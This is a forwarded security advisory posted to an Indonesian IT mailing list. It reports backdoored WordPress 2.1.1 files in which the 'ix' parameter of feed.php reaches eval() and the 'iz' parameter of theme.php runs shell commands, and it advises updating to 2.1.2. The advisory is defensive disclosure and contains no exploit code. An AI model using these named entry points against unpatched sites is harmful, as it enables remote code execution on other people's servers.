Buat yang doyan pakai Wordpress.

Salam,
Ladung

-----Original Message-----
From: Secunia Security Advisories [mailto:[EMAIL PROTECTED] 
Sent: 05 Maret 2007 21:34
To: [EMAIL PROTECTED]
Subject: [SA24374] WordPress Command Execution and PHP "eval()" Injection

TITLE:
WordPress Command Execution and PHP "eval()" Injection

SECUNIA ADVISORY ID:
SA24374

VERIFY ADVISORY:
http://secunia.com/advisories/24374/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
>From remote

SOFTWARE:
WordPress 2.x
http://secunia.com/product/6745/

DESCRIPTION:
Ivan Fratric has reported two vulnerabilities in WordPress, which can be
exploited by malicious people to compromise vulnerable systems.

1) Input passed to the "ix" parameter in wp-includes/feed.php is not
properly sanitised before being used in "eval()" calls. This can be
exploited to execute arbitrary PHP code.

2) Input passed to the "iz" parameter in wp-includes/theme.php is not
properly sanitised before being used to execute commands. This can be
exploited to execute arbitrary shell commands.

NOTE: The vulnerabilities were reportedly added by someone breaking into
WordPress's servers.

The vulnerabilities are reported in version 2.1.1 downloaded on
2007-02-25 or later.

SOLUTION:
Update to version 2.1.2.

PROVIDED AND/OR DISCOVERED BY:
Ivan Fratric

ORIGINAL ADVISORY:
Ivan Fratric:
http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.html

WordPress:
http://wordpress.org/development/2007/03/upgrade-212/



-- 
www.itcenter.or.id - Komunitas Teknologi Informasi Indonesia 
Gabung, Keluar, Mode Kirim : [EMAIL PROTECTED] 
## Jobs: itcenter.or.id/jobs ## Bursa: itcenter.or.id/bursa ##

## Jaket ITCENTER tersedia di http://shop.itcenter.or.id 
 
Yahoo! Groups Links

<*> To visit your group on the web, go to:
    http://groups.yahoo.com/group/ITCENTER/

<*> Your email settings:
    Individual Email | Traditional

<*> To change settings online go to:
    http://groups.yahoo.com/group/ITCENTER/join
    (Yahoo! ID required)

<*> To change settings via email:
    mailto:[EMAIL PROTECTED] 
    mailto:[EMAIL PROTECTED]

<*> To unsubscribe from this group, send an email to:
    [EMAIL PROTECTED]

<*> Your use of Yahoo! Groups is subject to:
    http://docs.yahoo.com/info/terms/
 

Kirim email ke